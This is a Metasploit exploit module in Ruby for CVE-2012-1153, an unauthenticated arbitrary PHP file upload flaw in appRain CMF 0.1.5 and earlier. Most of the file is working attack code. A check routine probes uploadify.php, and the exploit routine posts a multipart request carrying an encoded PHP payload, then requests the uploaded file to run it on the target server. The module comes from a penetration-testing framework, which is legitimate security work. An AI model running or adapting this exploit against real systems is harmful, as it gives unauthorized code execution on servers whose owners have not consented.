1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => "appRain CMF Arbitrary PHP File Upload Vulnerability",
16
        'Description' => %q{
17
          This module exploits a vulnerability found in appRain's Content Management
18
          Framework (CMF), version 0.1.5 or less.  By abusing the uploadify.php file, a
19
          malicious user can upload a file to the uploads/ directory without any
20
          authentication, which results in arbitrary code execution.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => [
24
          'EgiX', # Discovery, PoC
25
          'sinn3r' # Metasploit
26
        ],
27
        'References' => [
28
          ['CVE', '2012-1153'],
29
          ['OSVDB', '78473'],
30
          ['EDB', '18392'],
31
          ['BID', '51576']
32
        ],
33
        'Payload' => {
34
          'BadChars' => "\x00"
35
        },
36
        'DefaultOptions' => {
37
          'EXITFUNC' => 'thread'
38
        },
39
        'Platform' => ['php'],
40
        'Arch' => ARCH_PHP,
41
        'Targets' => [
42
          ['appRain 0.1.5 or less', {}]
43
        ],
44
        'Privileged' => false,
45
        'DisclosureDate' => '2012-01-19',
46
        'DefaultTarget' => 0,
47
        'Notes' => {
48
          'Reliability' => UNKNOWN_RELIABILITY,
49
          'Stability' => UNKNOWN_STABILITY,
50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
        }
52
      )
53
    )
54

55
    register_options(
56
      [
57
        OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])
58
      ]
59
    )
60
  end
61

62
  def check
63
    uri = target_uri.path
64
    uri << '/' if uri[-1, 1] != '/'
65

66
    res = send_request_cgi({
67
      'method' => 'GET',
68
      'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php')
69
    })
70

71
    if res and res.code == 200 and res.body.empty?
72
      return Exploit::CheckCode::Appears
73
    else
74
      return Exploit::CheckCode::Safe
75
    end
76
  end
77

78
  def exploit
79
    uri = target_uri.path
80

81
    peer = "#{rhost}:#{rport}"
82
    payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
83

84
    post_data = "--o0oOo0o\r\n"
85
    post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
86
    post_data << "<?php "
87
    post_data << payload.encoded
88
    post_data << " ?>\r\n"
89
    post_data << "--o0oOo0o\r\n"
90

91
    print_status("Sending PHP payload (#{payload_name})")
92
    res = send_request_cgi({
93
      'method' => 'POST',
94
      'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"),
95
      'ctype' => 'multipart/form-data; boundary=o0oOo0o',
96
      'data' => post_data
97
    })
98

99
    # If the server returns 200 and the body contains our payload name,
100
    # we assume we uploaded the malicious file successfully
101
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
102
      print_error("File wasn't uploaded, aborting!")
103
      return
104
    end
105

106
    print_status("Executing PHP payload (#{payload_name})")
107
    # Execute our payload
108
    res = send_request_cgi({
109
      'method' => 'GET',
110
      'uri' => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}")
111
    })
112

113
    # If we don't get a 200 when we request our malicious payload, we suspect
114
    # we don't have a shell, either.  Print the status code for debugging purposes.
115
    if res and res.code != 200
116
      print_status("Server returned #{res.code.to_s}")
117
    end
118
  end
119
end
120

121